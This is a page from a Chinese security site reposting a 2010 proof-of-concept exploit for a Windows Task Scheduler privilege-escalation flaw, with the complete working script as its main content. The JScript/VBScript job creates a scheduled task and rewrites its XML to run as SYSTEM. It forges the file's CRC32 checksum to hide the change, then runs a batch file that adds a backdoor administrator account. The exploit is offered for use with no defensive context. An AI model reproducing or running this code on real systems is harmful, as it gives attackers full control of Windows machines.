首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Windows Task Scheduler Privilege Escalation 0day
来源:vfocus.net 作者:webDEViL 发布时间:2010-11-22  

# Exploit Title: Windows Task Scheduler Privilege Escalation 0day
# Date: 20-11-2010
# Author: webDEViL
# Tested on: Windows 7/2008 x86/x64


<job id="tasksch-wD-0day">
<script language="Javascript">

crc_table = new Array(
  0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419,
  0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4,
  0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07,
  0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,
  0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856,
  0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9,
  0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4,
  0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
  0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3,
  0x45DF5C75, 0xDCD60DCF, 0xABD13D59, 0x26D930AC, 0x51DE003A,
  0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599,
  0xB8BDA50F, 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,
  0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 0x76DC4190,
  0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F,
  0x9FBFE4A5, 0xE8B8D433, 0x7807C9A2, 0x0F00F934, 0x9609A88E,
  0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
  0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED,
  0x1B01A57B, 0x8208F4C1, 0xF50FC457, 0x65B0D9C6, 0x12B7E950,
  0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3,
  0xFBD44C65, 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2,
  0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB, 0x4369E96A,
  0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5,
  0xAA0A4C5F, 0xDD0D7CC9, 0x5005713C, 0x270241AA, 0xBE0B1010,
  0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
  0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17,
  0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD, 0xEDB88320, 0x9ABFB3B6,
  0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615,
  0x73DC1683, 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8,
  0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1, 0xF00F9344,
  0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB,
  0x196C3671, 0x6E6B06E7, 0xFED41B76, 0x89D32BE0, 0x10DA7A5A,
  0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
  0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1,
  0xA6BC5767, 0x3FB506DD, 0x48B2364B, 0xD80D2BDA, 0xAF0A1B4C,
  0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF,
  0x4669BE79, 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,
  0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 0xC5BA3BBE,
  0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31,
  0x2CD99E8B, 0x5BDEAE1D, 0x9B64C2B0, 0xEC63F226, 0x756AA39C,
  0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
  0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B,
  0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 0x86D3D2D4, 0xF1D4E242,
  0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1,
  0x18B74777, 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C,
  0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45, 0xA00AE278,
  0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7,
  0x4969474D, 0x3E6E77DB, 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66,
  0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
  0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605,
  0xCDD70693, 0x54DE5729, 0x23D967BF, 0xB3667A2E, 0xC4614AB8,
  0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B,
  0x2D02EF8D
);

var hD='0123456789ABCDEF';

function dec2hex(d) {
h='';
for (i=0;i<8;i++) {
h = hD.charAt(d&15)+h;
d >>>= 4;
}
return h;
}
function encodeToHex(str){
    var r="";
    var e=str.length;
    var c=0;
    var h;
    while(c<e){
        h=str.charCodeAt(c++).toString(16);
        while(h.length<3) h="0"+h;
        r+=h;
    }
    return r;
}
function decodeFromHex(str){
    var r="";
    var e=str.length;
    var s=0;
    while(e>1){
  
        r=r+String.fromCharCode("0x"+str.substring(s,s+2));
  
  s=s+2;
  e=e-2;
    }
   
 return r;
 
}


function calc_crc(anyForm) {

anyTextString=decodeFromHex(anyForm);

Crc_value = 0xFFFFFFFF;
StringLength=anyTextString.length;
for (i=0; i<StringLength; i++) {
tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;
Table_value = crc_table[tableIndex];
Crc_value >>>= 8;
Crc_value ^= Table_value;
}
Crc_value ^= 0xFFFFFFFF;
return dec2hex(Crc_value);

}

function rev_crc(leadString,endString,crc32) {
//
// First, we calculate the CRC-32 for the initial string
//
 anyTextString=decodeFromHex(leadString);
 
   Crc_value = 0xFFFFFFFF;
   StringLength=anyTextString.length;
   //document.write(alert(StringLength));
   for (var i=0; i<StringLength; i++) {
      tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;
      Table_value = crc_table[tableIndex];
      Crc_value >>>= 8;
      Crc_value ^= Table_value;
   }
//
// Second, we calculate the CRC-32 without the final string
//
   crc=parseInt(crc32,16);
   crc ^= 0xFFFFFFFF;
   anyTextString=decodeFromHex(endString);
   StringLength=anyTextString.length;
   for (var i=0; i<StringLength; i++) {
      tableIndex=0;
      Table_value = crc_table[tableIndex];
      while (((Table_value ^ crc) >>> 24)  & 0xFF) {
         tableIndex++;
         Table_value = crc_table[tableIndex];
      }
      crc ^= Table_value;
      crc <<= 8;
      crc |= tableIndex ^ anyTextString.charCodeAt(StringLength - i -1);
   }
//
// Now let's find the 4-byte string
//
   for (var i=0; i<4; i++) {
      tableIndex=0;
      Table_value = crc_table[tableIndex];
      while (((Table_value ^ crc) >>> 24)  & 0xFF) {
         tableIndex++;
         Table_value = crc_table[tableIndex];
      }
      crc ^= Table_value;
      crc <<= 8;
      crc |= tableIndex;
   }
   crc ^= Crc_value;
//
// Finally, display the results
//
   var TextString=dec2hex(crc);
   var Teststring='';
Teststring=TextString.substring(6,8);
Teststring+=TextString.substring(4,6);
Teststring+=TextString.substring(2,4);
Teststring+=TextString.substring(0,2);
   return Teststring
}
function decodeFromHex(str){
    var r="";
    var e=str.length;
    var s=0;
    while(e>1){
  
        r=r+String.fromCharCode("0x"+str.substring(s,s+2));
  
  s=s+2;
  e=e-2;
    }
   
 return r;
 
}
</script>

 

<script language="VBScript">
dim output
set output = wscript.stdout
output.writeline " Task Scheduler 0 day - Privilege Escalation "
output.writeline " Should work on Vista/Win7/2008 x86/x64"
output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf
biatchFile = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\xpl.bat"
Set objShell = CreateObject("WScript.Shell")
objShell.Run "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True

Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.CreateTextFile(biatchFile, True)
a.WriteLine ("net user /add test123 test123")
a.WriteLine ("net localgroup administrators /add test123")
a.WriteLine ("schtasks /delete /f /TN wDw00t")

Function ReadByteArray(strFileName)
Const adTypeBinary = 1
Dim bin
    Set bin = CreateObject("ADODB.Stream")
    bin.Type = adTypeBinary
    bin.Open
    bin.LoadFromFile strFileName
    ReadByteArray = bin.Read
'output.writeline ReadByteArray
End Function

Function OctetToHexStr (arrbytOctet)
 Dim k
 OctetToHexStr = ""
 For k = 3 To Lenb (arrbytOctet)
  OctetToHexStr = OctetToHexStr _
        & Right("0" & Hex(Ascb(Midb(arrbytOctet, k, 1))), 2)
 Next
 End Function
strFileName="C:\windows\system32\tasks\wDw00t"

hexXML = OctetToHexStr (ReadByteArray(strFileName))
'output.writeline hexXML
crc32 = calc_crc(hexXML)
output.writeline "Crc32 Original: "+crc32


Set xmlDoc = CreateObject("Microsoft.XMLDOM")
'permissions workaround
'objShell.Run "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True
'objShell.Run "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True
Set objShell = WScript.CreateObject("WScript.Shell")
Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t")

Do Until objExecObject.StdOut.AtEndOfStream
 strLine = strLine & objExecObject.StdOut.ReadLine()
Loop
hexXML = "FFFE3C00"+OctetToHexStr(strLine)
'output.writeline hexXML
Set ts = fso.createtextfile ("wDw00t.xml")
For n = 1 To (Len (hexXML) - 1) step 2
 ts.write Chr ("&h" & Mid (hexXML, n, 2))
Next
ts.close

xmlDoc.load "wDw00t.xml"
Set Author = xmlDoc.selectsinglenode ("//Task/RegistrationInfo/Author")
Author.text = "LocalSystem"
Set UserId = xmlDoc.selectsinglenode ("//Task/Principals/Principal/UserId")
UserId.text = "S-1-5-18"
xmldoc.save(strFileName)

hexXML = OctetToHexStr (ReadByteArray(strFileName))

leadString=hexXML+"3C0021002D002D00"
endString="2D002D003E00"
'output.writeline leadString
impbytes=rev_crc(leadString,endString,crc32)
output.writeline "Crc32 Magic Bytes: "+impbytes

finalString = leadString+impbytes+endString
forge = calc_crc(finalString)
output.writeline "Crc32 Forged: "+forge

strHexString="FFFE"+finalString
Set fso = CreateObject ("scripting.filesystemobject")
Set stream = CreateObject ("adodb.stream")

Set ts = fso.createtextfile (strFileName)

For n = 1 To (Len (strHexString) - 1) step 2
 ts.write Chr ("&h" & Mid (strHexString, n, 2))
Next
ts.close


Set objShell = CreateObject("WScript.Shell")
objShell.Run "schtasks /change /TN wDw00t /disable",,True
objShell.Run "schtasks /change /TN wDw00t /enable",,True
objShell.Run "schtasks /run /TN wDw00t",,True

</script>
</job>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Minishare 1.5.5 Buffer Overflo
·Free CD to MP3 Converter 3.1 B
·Native Instruments Massive 1.1
·Xion Audio Player 1.0.126 (.m3
·Native Instruments Service Cen
·Xion Audio Player 1.0.127 (m3u
·Native Instruments Traktor Pro
·Netcraft Toolbar 1.8.1 Remote
·Native Instruments Kontakt 4 P
·ImageShack Toolbar 4.8.3.75 Re
·Sun Java Web Start BasicServic
·FreeNAS exec_raw.php Arbitrary
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved